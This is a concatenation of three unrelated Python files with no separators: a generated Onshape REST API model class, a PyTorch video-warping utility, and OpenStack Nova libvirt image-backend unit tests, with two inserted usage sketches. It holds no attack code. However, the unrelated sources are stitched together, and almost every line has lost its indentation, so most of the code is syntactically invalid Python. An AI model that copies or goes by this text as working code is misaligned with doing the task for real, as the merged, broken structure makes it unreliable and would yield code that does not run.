# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import btp_identifier8
except ImportError:
btp_identifier8 = sys.modules["onshape_client.oas.models.btp_identifier8"]
try:
from onshape_client.oas.models import btp_literal_number258
except ImportError:
btp_literal_number258 = sys.modules[
"onshape_client.oas.models.btp_literal_number258"
]
try:
from onshape_client.oas.models import btp_space10
except ImportError:
btp_space10 = sys.modules["onshape_client.oas.models.btp_space10"]
class BTPConversionFunction1362AllOf(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and, for var_name, this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and, for var_name, this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self; this ensures that we don't create a cyclic import.
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"_from": (btp_literal_number258.BTPLiteralNumber258,), # noqa: E501
"space_after_type": (btp_space10.BTPSpace10,), # noqa: E501
"to": (btp_literal_number258.BTPLiteralNumber258,), # noqa: E501
"type_name": (btp_identifier8.BTPIdentifier8,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"_from": "from", # noqa: E501
"space_after_type": "spaceAfterType", # noqa: E501
"to": "to", # noqa: E501
"type_name": "typeName", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btp_conversion_function1362_all_of.BTPConversionFunction1362AllOf - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
_from (btp_literal_number258.BTPLiteralNumber258): [optional] # noqa: E501
space_after_type (btp_space10.BTPSpace10): [optional] # noqa: E501
to (btp_literal_number258.BTPLiteralNumber258): [optional] # noqa: E501
type_name (btp_identifier8.BTPIdentifier8): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
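# A minimal usage sketch (editorial addition, not produced by the generator):
# keyword names follow attribute_map above, so the JSON key "from" would be
# passed as the Python keyword "_from". The bt_type value below is only an
# assumed example string.
if __name__ == "__main__":
    conversion = BTPConversionFunction1362AllOf(
        bt_type="BTPConversionFunction-1362",  # assumed discriminator value
    )
    # Attribute access is proxied to the model's internal _data_store.
    print(conversion.bt_type)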
import torch
import torch.nn as nn
import torch.nn.functional as F
class VideoTools:
@staticmethod
def flatten_high(image_high, upscale_factor):
"""
Reshapes the high resolution input image with shape
B x C x H*upscale_factor x W*upscale_factor
to a low resolution output image with shape
B x (C * upscale_factor * upscale_factor) x H x W.
This operation is the inverse of PixelShuffle.
"""
#source: https://github.com/pytorch/pytorch/issues/2456
b, c, h, w = image_high.shape
r = upscale_factor
out_channel = c*(r**2)
out_h = h//r
out_w = w//r
fm_view = image_high.contiguous().view(b, c, out_h, r, out_w, r)
fm_prime = fm_view.permute(0,1,3,5,2,4).contiguous().view(b,out_channel, out_h, out_w)
return fm_prime
_offset_cache = dict()
@staticmethod
def _grid_offsets(H, W, dtype, device):
"""
Returns the grid offsets HxWx2 within [-1,1]
"""
if (H,W) in VideoTools._offset_cache:
return VideoTools._offset_cache[(H,W)]
else:
print("Create grid offsets for warping: W=%d, H=%d"%(W, H))
grid_offsetsH = torch.linspace(-1, +1, H, dtype=dtype, device=device)
grid_offsetsW = torch.linspace(-1, +1, W, dtype=dtype, device=device)
grid_offsetsH = torch.unsqueeze(grid_offsetsH, 1)
grid_offsetsW = torch.unsqueeze(grid_offsetsW, 0)
grid_offsets = torch.stack(
torch.broadcast_tensors(grid_offsetsW, grid_offsetsH),
dim=2)
grid_offsets = torch.unsqueeze(grid_offsets, 0) # batch dimension
grid_offsets = grid_offsets.detach()
VideoTools._offset_cache[(H,W)] = grid_offsets
return grid_offsets
@staticmethod
#@profile
def warp_upscale(image_high, flow_low, upscale_factor, special_mask=False):
"""
Warps the high resolution input image with shape
B x C x H*upscale_factor x W*upscale_factor
with the upscaled low resolution flow in screen space with shape
B x 2 x H x W.
Output is the high resolution warped image
If special_mask==True, the first channel is treated as being the mask in range [-1,+1].
This channel is padded with -1, whereas all other channels are padded with zero.
"""
B, C, H, W = flow_low.shape
assert C==2
flow_x, flow_y = torch.chunk(flow_low, 2, dim=1)
flow_x = flow_x * -2.0
flow_y = flow_y * -2.0
flow_low2 = torch.cat((flow_x, flow_y), dim=1)
flow_high = F.interpolate(flow_low2, scale_factor = upscale_factor, mode='bilinear')
flow_high = flow_high.permute(0, 2, 3, 1) # move channels to last position
_, Hhigh, Whigh, _ = flow_high.shape
grid_offsets = VideoTools._grid_offsets(Hhigh, Whigh, flow_high.dtype, flow_high.device)
grid = grid_offsets + flow_high
if special_mask:
image_high = torch.cat([
image_high[:,0:1,:,:]*0.5+0.5,
image_high[:,1:,:,:]], dim=1)
warped_high = F.grid_sample(image_high, grid)
if special_mask:
warped_high = torch.cat([
warped_high[:,0:1,:,:]*2-1,
warped_high[:,1:,:,:]], dim=1)
return warped_high
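# Minimal self-check sketch (editorial addition, assuming only the PyTorch API
# already used above): flatten_high should invert F.pixel_shuffle, and
# warp_upscale with an all-zero flow reduces to a plain grid_sample resampling
# of the high resolution input.
if __name__ == "__main__":
    torch.manual_seed(0)
    b, c, h, w, r = 2, 3, 4, 5, 2
    low = torch.randn(b, c * r * r, h, w)
    high = F.pixel_shuffle(low, r)  # B x C x H*r x W*r
    # flatten_high is the inverse of PixelShuffle, so `low` is recovered exactly.
    assert torch.allclose(VideoTools.flatten_high(high, r), low)

    # With zero flow the sampling grid is just the cached base grid, so the
    # warped output keeps the high resolution shape.
    flow = torch.zeros(b, 2, h, w)
    warped = VideoTools.warp_upscale(high, flow, r)
    assert warped.shape == high.shape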
# Copyright 2012 Grid Dynamics
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import errno
import os
import shutil
import tempfile
from castellan import key_manager
import ddt
import fixtures
import mock
from oslo_concurrency import lockutils
from oslo_config import fixture as config_fixture
from oslo_service import loopingcall
from oslo_utils import imageutils
from oslo_utils import units
from oslo_utils import uuidutils
from nova.compute import utils as compute_utils
import nova.conf
from nova import context
from nova import exception
from nova import objects
from nova.storage import rbd_utils
from nova import test
from nova.tests.unit import fake_processutils
from nova import utils
from nova.virt.image import model as imgmodel
from nova.virt import images
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import utils as libvirt_utils
CONF = nova.conf.CONF
class FakeSecret(object):
def value(self):
return base64.b64decode("MTIzNDU2Cg==")
class FakeConn(object):
def secretLookupByUUIDString(self, uuid):
return FakeSecret()
@ddt.ddt
class _ImageTestCase(object):
def mock_create_image(self, image):
def create_image(fn, base, size, *args, **kwargs):
fn(target=base, *args, **kwargs)
image.create_image = create_image
def setUp(self):
super(_ImageTestCase, self).setUp()
self.fixture = self.useFixture(config_fixture.Config(lockutils.CONF))
self.INSTANCES_PATH = tempfile.mkdtemp(suffix='instances')
self.fixture.config(disable_process_locking=True,
group='oslo_concurrency')
self.flags(instances_path=self.INSTANCES_PATH)
self.INSTANCE = objects.Instance(id=1, uuid=uuidutils.generate_uuid())
self.DISK_INFO_PATH = os.path.join(self.INSTANCES_PATH,
self.INSTANCE['uuid'], 'disk.info')
self.NAME = 'fake.vm'
self.TEMPLATE = 'template'
self.CONTEXT = context.get_admin_context()
self.PATH = os.path.join(
libvirt_utils.get_instance_path(self.INSTANCE), self.NAME)
# TODO(mikal): rename template_dir to base_dir and template_path
# to cached_image_path. This will be less confusing.
self.TEMPLATE_DIR = os.path.join(CONF.instances_path, '_base')
self.TEMPLATE_PATH = os.path.join(self.TEMPLATE_DIR, 'template')
# Ensure can_fallocate is not initialised on the class
if hasattr(self.image_class, 'can_fallocate'):
del self.image_class.can_fallocate
# This will be used to mock some decorators like utils.synchronized
def _fake_deco(func):
return func
self._fake_deco = _fake_deco
def tearDown(self):
super(_ImageTestCase, self).tearDown()
shutil.rmtree(self.INSTANCES_PATH)
def test_prealloc_image(self):
CONF.set_override('preallocate_images', 'space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('os.access', lambda p, w: True)
with mock.patch.object(image, 'get_disk_size', return_value=self.SIZE):
# Call twice to verify testing fallocate is only called once.
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(),
['fallocate -l 1 %s.fallocate_test' % self.PATH,
'fallocate -n -l %s %s' % (self.SIZE, self.PATH),
'fallocate -n -l %s %s' % (self.SIZE, self.PATH)])
def test_prealloc_image_without_write_access(self):
CONF.set_override('preallocate_images', 'space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
with test.nested(
mock.patch.object(image, 'exists', lambda: True),
mock.patch.object(image, '_can_fallocate', lambda: True),
mock.patch.object(image, 'get_disk_size', lambda _: self.SIZE)
) as (mock_exists, mock_can, mock_get):
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('os.access', lambda p, w: False)
# Testing fallocate is only called when user has write access.
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(), [])
def test_libvirt_fs_info(self):
image = self.image_class(self.INSTANCE, self.NAME)
fs = image.libvirt_fs_info("/mnt")
# check that no exception has been raised and the method
# returned the correct object
self.assertIsInstance(fs, vconfig.LibvirtConfigGuestFilesys)
self.assertEqual(fs.target_dir, "/mnt")
if image.is_block_dev:
self.assertEqual(fs.source_type, "block")
self.assertEqual(fs.source_dev, image.path)
else:
self.assertEqual(fs.source_type, "file")
self.assertEqual(fs.source_file, image.path)
def test_libvirt_info(self):
image = self.image_class(self.INSTANCE, self.NAME)
extra_specs = {
'quota:disk_read_bytes_sec': 10 * units.Mi,
'quota:disk_read_iops_sec': 1 * units.Ki,
'quota:disk_write_bytes_sec': 20 * units.Mi,
'quota:disk_write_iops_sec': 2 * units.Ki,
'quota:disk_total_bytes_sec': 30 * units.Mi,
'quota:disk_total_iops_sec': 3 * units.Ki,
}
disk_info = {
'bus': 'virtio',
'dev': '/dev/vda',
'type': 'cdrom',
}
disk = image.libvirt_info(disk_info,
cache_mode="none",
extra_specs=extra_specs,
hypervisor_version=4004001,
boot_order="1")
self.assertIsInstance(disk, vconfig.LibvirtConfigGuestDisk)
self.assertEqual("/dev/vda", disk.target_dev)
self.assertEqual("virtio", disk.target_bus)
self.assertEqual("none", disk.driver_cache)
self.assertEqual("cdrom", disk.source_device)
self.assertEqual("1", disk.boot_order)
self.assertEqual(10 * units.Mi, disk.disk_read_bytes_sec)
self.assertEqual(1 * units.Ki, disk.disk_read_iops_sec)
self.assertEqual(20 * units.Mi, disk.disk_write_bytes_sec)
self.assertEqual(2 * units.Ki, disk.disk_write_iops_sec)
self.assertEqual(30 * units.Mi, disk.disk_total_bytes_sec)
self.assertEqual(3 * units.Ki, disk.disk_total_iops_sec)
@mock.patch('nova.virt.disk.api.get_disk_size')
def test_get_disk_size(self, get_disk_size):
get_disk_size.return_value = 2361393152
image = self.image_class(self.INSTANCE, self.NAME)
self.assertEqual(2361393152, image.get_disk_size(image.path))
get_disk_size.assert_called_once_with(image.path)
def _test_libvirt_info_scsi_with_unit(self, disk_unit):
# The address should be set if bus is scsi and unit is set.
# Otherwise, it should not be set at all.
image = self.image_class(self.INSTANCE, self.NAME)
disk_info = {
'bus': 'scsi',
'dev': '/dev/sda',
'type': 'disk',
}
disk = image.libvirt_info(disk_info, cache_mode='none', extra_specs={},
hypervisor_version=4004001,
disk_unit=disk_unit)
if disk_unit:
self.assertEqual(0, disk.device_addr.controller)
self.assertEqual(disk_unit, disk.device_addr.unit)
else:
self.assertIsNone(disk.device_addr)
@ddt.data(5, None)
def test_libvirt_info_scsi_with_unit(self, disk_unit):
self._test_libvirt_info_scsi_with_unit(disk_unit)
class FlatTestCase(_ImageTestCase, test.NoDBTestCase):
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Flat
super(FlatTestCase, self).setUp()
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
@mock.patch.object(os.path, 'exists')
def test_cache(self, mock_exists, mock_ensure):
self.stub_out('nova.virt.libvirt.imagebackend.Flat.correct_format',
lambda _: None)
mock_exists.side_effect = [False, False, False]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
fn(target=self.TEMPLATE_PATH)
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_image_exists(self, mock_exists):
self.stub_out('nova.virt.libvirt.imagebackend.Flat.correct_format',
lambda _: None)
mock_exists.side_effect = [True, True, True]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_base_dir_exists(self, mock_exists):
self.stub_out('nova.virt.libvirt.imagebackend.Flat.correct_format',
lambda _: None)
mock_exists.side_effect = [True, False, False]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
fn(target=self.TEMPLATE_PATH)
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_template_exists(self, mock_exists):
self.stub_out('nova.virt.libvirt.imagebackend.Flat.correct_format',
lambda _: None)
mock_exists.side_effect = [True, False, True]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch('os.path.exists')
def test_cache_generating_resize(self, mock_path_exists):
# Test for bug 1608934
# The Flat backend doesn't write to the image cache when creating a
# non-image backend. Test that we don't try to get the disk size of
# a non-existent backend.
base_dir = os.path.join(CONF.instances_path,
CONF.image_cache.subdirectory_name)
# Let's assume the base image cache directory already exists
existing = set([base_dir])
def fake_exists(path):
# Return True only for files previously created during
# execution. This allows us to test that we're not calling
# get_disk_size() on something which hasn't been previously
# created.
return path in existing
def fake_get_disk_size(path):
# get_disk_size will explode if called on a path which doesn't
# exist. Specific exception not important for this test.
if path not in existing:
raise AssertionError
# Not important, won't actually be called by patched code.
return 2 * units.Gi
def fake_template(target=None, **kwargs):
# The template function we pass to cache. Calling this will
# cause target to be created.
existing.add(target)
mock_path_exists.side_effect = fake_exists
image = self.image_class(self.INSTANCE, self.NAME)
# We're not testing preallocation
image.preallocate = False
with test.nested(
mock.patch.object(image, 'exists'),
mock.patch.object(image, 'correct_format'),
mock.patch.object(image, 'get_disk_size'),
mock.patch.object(image, 'resize_image')
) as (
mock_disk_exists, mock_correct_format, mock_get_disk_size,
mock_resize_image
):
# Assume the disk doesn't already exist
mock_disk_exists.return_value = False
# This won't actually be executed since change I46b5658e,
# but this is how the unpatched code will fail. We include this
# here as a belt-and-braces sentinel.
mock_get_disk_size.side_effect = fake_get_disk_size
# Try to create a 2G image
image.cache(fake_template, 'fake_cache_name', 2 * units.Gi)
# The real assertion is that the above call to cache() didn't raise
# AssertionError, which, since we got this far, it clearly didn't.
self.assertFalse(image.resize_image.called)
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.privsep.path.utime')
def test_create_image(self, mock_utime, mock_sync, mock_copy, mock_extend):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, None, image_id=None)
mock_copy.assert_called_once_with(self.TEMPLATE_PATH, self.PATH)
fn.assert_called_once_with(target=self.TEMPLATE_PATH, image_id=None)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_extend.called)
mock_utime.assert_called()
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch.object(imagebackend.utils, 'synchronized')
def test_create_image_generated(self, mock_sync, mock_copy, mock_extend):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, None)
fn.assert_called_once_with(target=self.PATH)
self.assertFalse(mock_copy.called)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_extend.called)
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch('nova.privsep.path.utime')
def test_create_image_extend(self, mock_utime, mock_qemu, mock_sync,
mock_copy, mock_extend):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
mock_qemu.return_value.virtual_size = 1024
fn(target=self.TEMPLATE_PATH, image_id=None)
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH,
self.SIZE, image_id=None)
mock_copy.assert_called_once_with(self.TEMPLATE_PATH, self.PATH)
self.assertTrue(mock_sync.called)
mock_extend.assert_called_once_with(
imgmodel.LocalFileImage(self.PATH, imgmodel.FORMAT_RAW),
self.SIZE)
mock_qemu.assert_called_once_with(self.TEMPLATE_PATH)
mock_utime.assert_called()
@mock.patch.object(os.path, 'exists')
@mock.patch.object(imagebackend.images, 'qemu_img_info')
def test_correct_format(self, mock_qemu, mock_exist):
mock_exist.side_effect = [True, False, True]
info = mock.MagicMock()
info.file_format = 'foo'
mock_qemu.return_value = info
image = self.image_class(self.INSTANCE, self.NAME, path=self.PATH)
self.assertEqual(image.driver_format, 'foo')
mock_qemu.assert_called_once_with(self.PATH)
mock_exist.assert_has_calls([mock.call(self.PATH),
mock.call(self.DISK_INFO_PATH),
mock.call(CONF.instances_path)])
@mock.patch.object(images, 'qemu_img_info',
side_effect=exception.InvalidDiskInfo(
reason='invalid path'))
def test_resolve_driver_format(self, fake_qemu_img_info):
image = self.image_class(self.INSTANCE, self.NAME)
driver_format = image.resolve_driver_format()
self.assertEqual(driver_format, 'raw')
def test_get_model(self):
image = self.image_class(self.INSTANCE, self.NAME)
model = image.get_model(FakeConn())
self.assertEqual(imgmodel.LocalFileImage(self.PATH,
imgmodel.FORMAT_RAW),
model)
class Qcow2TestCase(_ImageTestCase, test.NoDBTestCase):
SIZE = units.Gi
def setUp(self):
self.image_class = imagebackend.Qcow2
super(Qcow2TestCase, self).setUp()
self.QCOW2_BASE = (self.TEMPLATE_PATH +
'_%d' % (self.SIZE / units.Gi))
@mock.patch.object(os.path, 'exists')
def test_cache(self, mock_exists):
mock_exists.side_effect = [False, True, False, True, False, False]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(CONF.instances_path),
mock.call(self.TEMPLATE_DIR),
mock.call(self.INSTANCES_PATH),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
image.cache(fn, self.TEMPLATE)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_image_exists(self, mock_exists):
mock_exists.side_effect = [False, True, True, True, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_base_dir_exists(self, mock_exists):
mock_exists.side_effect = [False, True, True, False, False]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_template_exists(self, mock_exists):
mock_exists.side_effect = [False, True, True, False, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch('nova.privsep.path.utime')
def test_create_image(self, mock_utime, mock_extend, mock_create,
mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, None)
mock_create.assert_called_once_with(self.TEMPLATE_PATH, self.PATH)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_extend.called)
mock_utime.assert_called()
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch.object(os.path, 'exists', side_effect=[])
@mock.patch.object(imagebackend.Image, 'verify_base_size')
@mock.patch('nova.privsep.path.utime')
def test_create_image_with_size(self, mock_utime, mock_verify, mock_exist,
mock_extend, mock_create, mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
mock_exist.side_effect = [False, True, False, False, False]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_PATH),
mock.call(self.PATH),
mock.call(self.PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_verify.assert_called_once_with(self.TEMPLATE_PATH, self.SIZE)
mock_create.assert_called_once_with(self.TEMPLATE_PATH, self.PATH)
mock_extend.assert_called_once_with(
imgmodel.LocalFileImage(self.PATH, imgmodel.FORMAT_QCOW2),
self.SIZE)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_exist.assert_has_calls(exist_calls)
self.assertTrue(mock_sync.called)
mock_utime.assert_called()
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch.object(os.path, 'exists', side_effect=[])
@mock.patch.object(imagebackend.Qcow2, 'get_disk_size')
@mock.patch('nova.privsep.path.utime')
def test_create_image_too_small(self, mock_utime, mock_get, mock_exist,
mock_extend, mock_create, mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
mock_get.return_value = self.SIZE
fn = mock.MagicMock()
mock_exist.side_effect = [False, True, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(exception.FlavorDiskSmallerThanImage,
image.create_image, fn, self.TEMPLATE_PATH, 1)
mock_get.assert_called_once_with(self.TEMPLATE_PATH)
mock_exist.assert_has_calls(exist_calls)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_create.called)
self.assertFalse(mock_extend.called)
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch('nova.virt.libvirt.utils.get_disk_backing_file')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch.object(os.path, 'exists', side_effect=[])
@mock.patch.object(imagebackend.Image, 'verify_base_size')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch('nova.privsep.path.utime')
def test_generate_resized_backing_files(self, mock_utime, mock_copy,
mock_verify, mock_exist,
mock_extend, mock_get,
mock_create, mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
mock_get.return_value = self.QCOW2_BASE
fn = mock.MagicMock()
mock_exist.side_effect = [False, True, False, True, False, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(CONF.instances_path),
mock.call(self.TEMPLATE_PATH),
mock.call(self.PATH),
mock.call(self.QCOW2_BASE),
mock.call(self.PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_get.assert_called_once_with(self.PATH)
mock_verify.assert_called_once_with(self.TEMPLATE_PATH, self.SIZE)
mock_copy.assert_called_once_with(self.TEMPLATE_PATH,
self.QCOW2_BASE)
mock_extend.assert_called_once_with(
imgmodel.LocalFileImage(self.QCOW2_BASE,
imgmodel.FORMAT_QCOW2), self.SIZE)
mock_exist.assert_has_calls(exist_calls)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_create.called)
mock_utime.assert_called()
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch('nova.virt.libvirt.utils.get_disk_backing_file')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch.object(os.path, 'exists', side_effect=[])
@mock.patch.object(imagebackend.Image, 'verify_base_size')
@mock.patch('nova.privsep.path.utime')
def test_qcow2_exists_and_has_no_backing_file(self, mock_utime,
mock_verify, mock_exist,
mock_extend, mock_get,
mock_create, mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
mock_get.return_value = None
fn = mock.MagicMock()
mock_exist.side_effect = [False, True, False, True, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_PATH),
mock.call(self.PATH),
mock.call(self.PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_get.assert_called_once_with(self.PATH)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_verify.assert_called_once_with(self.TEMPLATE_PATH, self.SIZE)
mock_exist.assert_has_calls(exist_calls)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_create.called)
self.assertFalse(mock_extend.called)
def test_resolve_driver_format(self):
image = self.image_class(self.INSTANCE, self.NAME)
driver_format = image.resolve_driver_format()
self.assertEqual(driver_format, 'qcow2')
def test_get_model(self):
image = self.image_class(self.INSTANCE, self.NAME)
model = image.get_model(FakeConn())
self.assertEqual(imgmodel.LocalFileImage(self.PATH,
imgmodel.FORMAT_QCOW2),
model)
